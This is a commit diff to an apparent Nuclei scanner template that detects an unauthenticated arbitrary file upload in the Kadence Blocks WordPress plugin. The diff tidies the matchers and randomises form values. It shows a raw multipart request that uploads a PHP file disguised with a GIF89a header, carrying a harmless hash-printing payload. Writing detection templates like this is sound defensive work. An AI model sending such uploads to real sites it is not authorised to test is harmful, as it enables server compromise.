updated matcher

2023-10-20 20:27:14 +05:30 · 2023-10-20 20:27:14 +05:30 · 46ff6b8912
parent 545aa4af3b
commit 46ff6b8912
1 changed files with 12 additions and 22 deletions
--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@ -1,7 +1,7 @@
 id: wp-kadence-blocks-rce

 info:
-  name: WordPress Gutenberg Blocks by Kadence Blocks Plugin <= 3.1.10 is vulnerable to Arbitrary File Upload
+  name: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
@ -10,8 +10,8 @@ info:
    - https://wordpress.org/plugins/kadence-blocks/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks/kadence-blocks-3110-unauthenticated-arbitrary-file-upload
  metadata:
-    verified: "true"
-  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,unauthenticated
+    verified: true
+  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks

 http:
  - raw:
@ -27,22 +27,22 @@ http:
        -----------------------------8779924633391890046425977712
        Content-Disposition: form-data; name="fieldfb0b94-aa"

-        test
+        {{randstr}}
        -----------------------------8779924633391890046425977712
        Content-Disposition: form-data; name="fieldec6f26-c7"

-        test@test.com
+        {{randstr}}@email.com
        -----------------------------8779924633391890046425977712
        Content-Disposition: form-data; name="fieldc9b894-4c"

-        test
+        {{randstr}}
        -----------------------------8779924633391890046425977712
        Content-Disposition: form-data; name="field983473-0a"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        GIF89a

-        <?php echo md5("pdteam");?>
+        <?php echo md5("{{randstr}}");?>
        -----------------------------8779924633391890046425977712
        Content-Disposition: form-data; name="_kb_adv_form_post_id"

@ -61,24 +61,14 @@ http:
        {{nonce}}
        -----------------------------8779924633391890046425977712--

-    matchers-condition: and
    matchers:
-      - type: word
-        part: body_2
-        words:
-          - 'Submission Success, Thanks for getting in touch!'
-          - '"success":true'
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "application/json")'
+          - 'contains_all(body_2, "Submission Success, Thanks for getting in touch!", "success\":true")'
        condition: and

-      - type: word
-        part: header_2
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
-
    extractors:
      - type: regex
        name: nonce